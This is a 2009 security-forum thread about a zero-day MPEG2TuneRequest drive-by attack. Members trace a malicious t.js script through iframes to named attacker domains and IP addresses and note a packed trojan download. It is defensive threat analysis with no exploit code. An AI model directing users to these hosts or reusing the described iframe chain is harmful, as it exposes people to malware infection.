Author Topic: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV  (Read 2941 times)

0 Members and 1 Guest are viewing this topic.

July 07, 2009, 07:20:29 am
Read 2941 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

July 09, 2009, 08:29:33 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Code: [Select]
I thought I'd give you guys a quick analysis of what myb88.com/t.js (IP: 203.158.16.18), as mentioned by DNS-BH, actually does. The first thing we need to look at, is the contents of t.js;

From here, we can see that it is loading an iFrame to bybyybyb.com (59.34.197.154 - AS4134), based on whether tmpdomain is equal to zero (which is based on whether or not the URL matches any of the items in the arydomain array). This iFrame, then loads another iframe to index.htm which contains;

http://hphosts.blogspot.com/2009/07/myb88comtjs-quick-analysis.html
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 10, 2009, 05:28:52 am
Reply #2

RS-232

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 165
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

July 10, 2009, 06:04:29 am
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
NOD flagged it (the rar, as it was downloading) as the Statik trojan
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 10, 2009, 04:14:48 pm
Reply #4

RS-232

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 165
The executable there appears to be multi-packed,at least from a very quick first look...
probably also the reason that some AVs reported "unknown packer" etc.

...Here's another interesting thread that I stumbled upon:
http://bbs.pediy.com/showthread.php?t=92912
Related to the domains mentioned in pediy's thread above:
http://blog.scansafe.com/journal/2009/7/7/china-attacks-worsen.html
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

July 11, 2009, 12:30:00 pm
Reply #5

RS-232

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 165
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw